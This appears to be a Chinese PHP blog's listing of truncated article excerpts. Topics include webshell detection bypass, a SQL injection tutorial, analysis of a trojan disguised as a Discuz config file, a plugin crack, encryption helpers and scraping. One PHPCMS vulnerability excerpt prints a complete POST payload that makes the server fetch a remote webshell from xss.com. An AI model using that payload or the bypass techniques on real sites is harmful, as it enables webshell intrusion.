文章作者:landgrey
0x00: 前言
一般的,利用能够执行系统命令、加载代码的函数,或者组合一些普通函数,完成一些高级间谍功能的网站后门的脚本,叫做Webshell。
本篇文章主要探讨关于PHP语言的Webshell检测工具和平台的绕过方法,实现能够绕过以下表格中7个主流(基本代表安全行业内PHP Webshell检测的一流水平)专业工具和平台检测的PHP Webshell,构造出零提示、无警告...
php一句话木马检测绕过研究
PHP中的抽象类与抽象方法/静态属性和静态方法/PHP中的单利模式(单态模式)/串行化与反串行化(序列化与反序列化)/约束类型/魔术方法小结
PHP中的抽象类与抽象方法
1、什么是抽象方法?
没有方法体 {} 的方法,必须使用abstract 关键字修饰。这样的方,我们叫做抽象方法。
abstract function say(); // 抽象方法
2、什么是抽象类?
包含抽象方法的类就叫抽象类。抽象类必须使用abstract关键字修饰。
abstract class Person{}
3、抽象类的注意事项
① 抽象类可以包...
PHPCMS最新版任意文件上传漏洞 及 修复方法
注意这个漏洞不知道是哪位朋友爆出来的,找不到来路。。我只是给了修复建议。
首先打开注册页面,然后向注册页面POST如下payload:
siteid=1&modelid=11&username=123456&password=123456&email=123456@qq.com&info[content]=<img src=http://xss.com/webshell//php_assert.php#.jpg>&dosubmit=1&protocol=
然后就会报错并返回shell地址...
3组PHP加密解密方法 PHP可逆加密解密算法
第一组PHP函数是实现此加密解密的方法:
加密算法如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
function encrypt($data, $key)
{
$key = md5($key);
$x = 0;
$len = strlen($data);
$l = strlen($key);
for ($i = 0; $i < $len; $i++)
{
if ($x == $l&...
【PHP代码审计】 初级入门SQL注入过程
很多同学不明白SQL注入过程,这里讲解的非常详细,所以就转载过来了。
0x02 环境搭建
PHP+MySql的集成环境特别多,像PhpStudy、Wamp和Lamp等下一步下一步点下去就成功安装了,网上搜索一下很多就不赘述。
这里提的环境是SQLol,它是一个可配置的SQL注入测试平台,包含了简单的SQL注入测试环境,即SQL语句的四元素增(Insert)、删(Delete)、改(Update)和查(Select)。
...
一个伪装Discuz配置文件的php木马分析
问题出于土司论坛(地址):https://www.t00ls.net/thread-36298-1-1.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96...
Discuz admin.php后台异地登录提示 及前台异地登录提示插件破解
首先修改后台文件source/admincp/admincp_main.php 在适当的位置添加如下代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
if($_G[uid] && $_G['cookie']['logindetail']){
echo <<<EOT
<div class="focus userlogin" id="login_unusual">
<div class="bm">
<div class=&...
php curl_getinfo的巧用
最近使用curl的时候,发现了一个比较好用的函数,当然是初级者适用的一个函数,就是curl_getinfo(),
在抓取一个页面的时候,会遇到302页面跳转的情况,刚开始处理的时候,是用curl抓取一个域名页面的内容,适用curl_exec,抓取页面全部内容,然后用正则匹配出来用户域名url,通过此域名再次抓取此地址的内容,这样做挺麻烦的,后来发现curl_getinfo(),返回来一个数组类型的...
密码保护:php post get 模拟登陆OR采集数据代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
11...
利用QueryList多线程插件批量下载太平洋电脑网壁纸,涉及到采集gzip页面,很容易被当作乱码
PHP采集,演示QueryList3.0多线程插件使用技巧,多线程批量采集页面同时批量下载图片;以及采集gzip页面,gzip页面很容易被误以为是乱码,实际上是经过压缩过的页面,解压后即可看到原网页内容。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?php
require '/QueryList/QueryList.class.php';
$urls = array(...